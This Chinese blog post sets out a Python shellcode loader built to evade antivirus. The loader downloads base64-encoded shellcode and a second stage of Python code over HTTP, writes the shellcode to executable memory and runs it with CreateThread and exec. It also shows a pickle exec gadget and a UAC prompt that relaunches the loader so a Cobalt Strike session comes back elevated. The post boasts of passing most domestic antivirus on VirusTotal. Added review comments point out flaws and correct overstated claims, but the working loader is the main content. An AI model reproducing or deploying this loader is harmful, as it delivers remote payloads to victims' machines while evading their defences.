一、shellcode 文件编码（注意：本文所说的"加密"实际上只是 base64 编码。base64 不是加密，不提供任何保密性，只是把字节转换成可传输的文本）
# -*- coding: utf-8 -*-
# @Time : 2022/7/11 23:01
# @Author : pipijun
# @File : bypass.py
# @Software: PyCharm
import pickle,ctypes,urllib.request,codecs,base64
# Stage 1: fetch the encoded shellcode over HTTP and turn it into raw bytes.
# NOTE(review): this is an unauthenticated, plaintext HTTP fetch with no
# integrity check (no hash, no signature). Whatever the response contains is
# copied into executable memory and run below, so anyone who can answer for
# 127.0.0.1:80 or alter the response controls what this process executes.
shellcode = urllib.request.urlopen('http://127.0.0.1/bypass.txt').read()
# print(shellcode)
# The served file is base64 text. base64 is an encoding, not encryption: it
# gives no confidentiality, only a text-safe representation of the bytes.
shellcode = base64.b64decode(shellcode)
# The decoded text is expected to be backslash-escaped bytes ("\x.." style);
# escape_decode() turns that text into the actual bytes and returns a
# (bytes, consumed_length) tuple, of which only the bytes are kept.
shellcode =codecs.escape_decode(shellcode)[0]
# A mutable buffer is needed so from_buffer() below can hand the memory to
# ctypes without a copy.
shellcode = bytearray(shellcode)
# VirtualAlloc returns an LPVOID. Declaring the return type as 64-bit keeps the
# pointer intact; ctypes' default c_int restype would truncate it on x64.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# Allocate len(shellcode) bytes: 0x3000 = MEM_COMMIT | MEM_RESERVE and
# 0x40 = PAGE_EXECUTE_READWRITE in the Win32 API, i.e. one region that is
# writable and executable at the same time (a classic injection indicator).
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# Copy the shellcode bytes into the executable region.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# Start a thread whose entry point is the first byte of the copied shellcode.
# NOTE(review): CreateThread.restype is left at ctypes' default c_int, so the
# returned HANDLE is truncated to 32 bits. This happens to work while handle
# values are small; the correct declaration is a pointer-sized restype.
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# Block until the shellcode thread exits; -1 passed as a DWORD is INFINITE.
# NOTE(review): re-wrapping the handle in c_int repeats the 32-bit truncation.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
class A(object):
    """Pickle gadget: unpickling an instance calls exec() on the module-level
    ``shellcode`` object.

    NOTE(review): this turns ``pickle.loads()`` of the resulting stream into an
    arbitrary-code-execution primitive. Also note that exec() parses its
    argument as Python source, so handing it the raw machine-code bytearray
    built above would almost certainly fail to parse rather than run the
    shellcode; the page never actually loads this pickle.
    """
    def __reduce__(self):
        # (callable, args): pickle will call exec(shellcode) on load.
        return (exec, (shellcode,))
# Serialize the gadget: `ret` is a pickle stream that runs exec(shellcode)
# as a side effect of being loaded.
ret = pickle.dumps(A())
# base64 here is only a transport-safe encoding, not encryption.
ret_base64 = base64.b64encode(ret)
print(ret_base64)
# Round-trips the encoding only; the pickle itself is never loaded in this
# listing and `ret_decode` is not used further.
ret_decode = base64.b64decode(ret_base64)
base64 编码后的 shellcode（base64 只是编码，不是加密）
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
二、执行代码的函数 func() 的编码
func() 函数体（下面这段就是 func.txt 的明文内容，最终由 bypass_func.py 取回并 exec；它依赖调用方脚本中已经定义好的 shellcode 变量）
# Body of "func": this listing is the plaintext that gets base64-encoded into
# func.txt and is later fetched and passed to exec() by the loader script.
# It is not a function definition here; it relies on the caller having
# already bound `shellcode` to a bytearray of raw machine code.
# VirtualAlloc returns an LPVOID; a 64-bit restype keeps the pointer intact
# instead of ctypes' default c_int truncation on x64.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# Allocate len(shellcode) bytes: 0x3000 = MEM_COMMIT | MEM_RESERVE and
# 0x40 = PAGE_EXECUTE_READWRITE in the Win32 API (one RWX region).
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# Copy the shellcode bytes into the executable region.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)
# Start a thread whose entry point is the first byte of the copied shellcode.
# NOTE(review): CreateThread.restype is left at the default c_int, so the
# returned HANDLE is truncated to 32 bits; works only while handle values
# are small. A pointer-sized restype is the correct declaration.
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)
# Block until the shellcode thread exits; -1 as a DWORD is INFINITE.
# NOTE(review): c_int(handle) repeats the 32-bit truncation of the handle.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
class A(object):
    """Pickle gadget: unpickling an instance calls exec() on the module-level
    ``shellcode`` object.

    NOTE(review): ``pickle.loads()`` of the resulting stream becomes an
    arbitrary-code-execution primitive. exec() parses its argument as Python
    source, so a raw machine-code bytearray would fail to parse rather than
    execute; this gadget is not loaded anywhere on the page.
    """
    def __reduce__(self):
        # (callable, args): pickle will call exec(shellcode) on load.
        return exec, (shellcode,)
# Serialize the gadget: loading `ret` would call exec(shellcode).
ret = pickle.dumps(A())
print(ret)
# base64 is a transport-safe encoding only, not encryption.
ret_base64 = base64.b64encode(ret)
print(ret_base64)
# Round-trips the encoding; the pickle is never loaded here and
# `ret_decode` is not used further in this listing.
ret_decode = base64.b64decode(ret_base64)
将上述代码进行 base64 编码（不是加密）后，保存为 func.txt
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
启动一个http服务,把bypass.txt和func.txt上传到根目录
python -m http.server 80
http://IP/bypass.txt
http://IP/func.txt
路径可以任意，但需要与脚本中请求的地址保持一致。注意：python -m http.server 会把当前目录下的所有文件对外提供；整个链路是明文 HTTP，没有任何完整性校验（无哈希、无签名），而 loader 会把取回的内容直接 exec 或写入可执行内存执行——任何能控制该地址或篡改响应的人都可以在目标机器上以 loader 进程的权限执行任意代码。
最终bypass_func.py
# -*- coding: utf-8 -*-
# @Time : 2022/7/12 10:01
# @Author : pipijun
# @File : bypass_func.py
# @Software: PyCharm
# func 不落地
import pickle,ctypes,urllib.request,codecs,base64
# Stage 1: fetch the shellcode (base64 text of backslash-escaped bytes) and
# decode it into a mutable bytearray.
# NOTE(review): plaintext HTTP to a hard-coded LAN address, no TLS, and no
# hash or signature check on what comes back.
shellcode = urllib.request.urlopen('http://192.168.243.193/bypass.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# Stage 2: fetch the base64-encoded Python source of "func" and run it with
# exec(). That source is expected to reference the `shellcode` bytearray
# bound above. The downloaded code runs with this process's full privileges;
# whoever controls (or can spoof or intercept) 192.168.243.193 controls what
# executes here. `pickle` is imported at the top of this script but unused.
func= urllib.request.urlopen('http://192.168.243.193/func.txt').read()
base_func=base64.b64decode(func)
exec (base_func)
三、免杀效果
使用pyinstaller编译成exe文件,上传到VT进行检测
国内杀软基本都能免杀，可见免杀效果还是很理想（注：VT 结果只反映提交当时各引擎的静态扫描情况，并不代表真实终端上带行为检测/EDR 的环境；本文代码中分配 RWX 内存、用 CreateThread 执行、以及运行时从 HTTP 拉取代码直接 exec 这些行为，通常都是常见的检测特征）
四、改进功能
在实现免杀功能后，尝试 CS 上线后提权，奈何绕不过杀软。如果直接以管理员权限运行，则能获得管理员权限，但是 Windows 中程序不会默认以高权限启动，于是改进思路为直接提示用户以管理员权限启动，否则不运行，这就跟"无视风险继续安装"是一个套路了（注：这依赖用户在 UAC 弹窗中主动点"是"，并不是 UAC 绕过或提权漏洞；另外脚本没有检查 ShellExecuteW 的返回值，用户拒绝后脚本会直接静默退出）
# -*- coding: utf-8 -*-
# @Time : 2022/7/12 16:31
# @Author : pipijun
# @File : bypass_admin.py
# @Software: PyCharm
import pickle, ctypes, urllib.request, codecs, base64,sys
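def is_admin():
    """Return True when the current process token is elevated (Windows only).

    Calls shell32.IsUserAnAdmin(). On non-Windows Python there is no
    ``ctypes.windll`` (AttributeError), and a failed DLL/symbol lookup raises
    OSError; both are reported as False instead of propagating. Any other
    exception is a real bug and is no longer swallowed by a bare ``except``.
    """
    try:
        # IsUserAnAdmin returns a Win32 BOOL (int); normalise to a Python bool.
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        return False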
if is_admin():
    # Already elevated: fetch the shellcode and the loader source and run them.
    # NOTE(review): both downloads are plaintext HTTP to a hard-coded address
    # with no integrity check, and the second one goes straight into exec();
    # everything it does runs under the elevated token just confirmed above.
    shellcode = urllib.request.urlopen('http://192.168.243.193/bypass.txt').read()
    shellcode = base64.b64decode(shellcode)
    # base64 -> backslash-escaped text -> raw bytes -> mutable buffer.
    shellcode = codecs.escape_decode(shellcode)[0]
    shellcode = bytearray(shellcode)
    func = urllib.request.urlopen('http://192.168.243.193/func.txt').read()
    base_func = base64.b64decode(func)
    exec(base_func)
else:
    # Not elevated: relaunch this script through ShellExecuteW with the
    # "runas" verb, which raises a UAC consent prompt (1 = SW_SHOWNORMAL).
    # Nothing runs unless the user accepts; this is a prompt, not a UAC bypass.
    # NOTE(review): the return value is ignored, so a declined prompt
    # (ShellExecuteW returns <= 32) just ends the script silently.
    # NOTE(review): when frozen with PyInstaller, sys.executable is the bundled
    # exe and __file__ points at the extracted script; whether the relaunched
    # exe honours that argument is not shown here — confirm on the packaged build.
    ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
运行后会弹出窗口提示
点击"是"后，CS 上线，作者记为 system 权限（注：仅靠 runas 得到的是 UAC 提升后的管理员令牌/高完整性级别，并不等于 NT AUTHORITY\SYSTEM；本文没有展示从管理员进一步到 SYSTEM 的步骤）
编译成exe后上传VT进行检测
本文作者:皮皮峻
原文链接https://www.yuque.com/docs/share/aa015a1e-b28a-4b99-b178-4010112f921c?#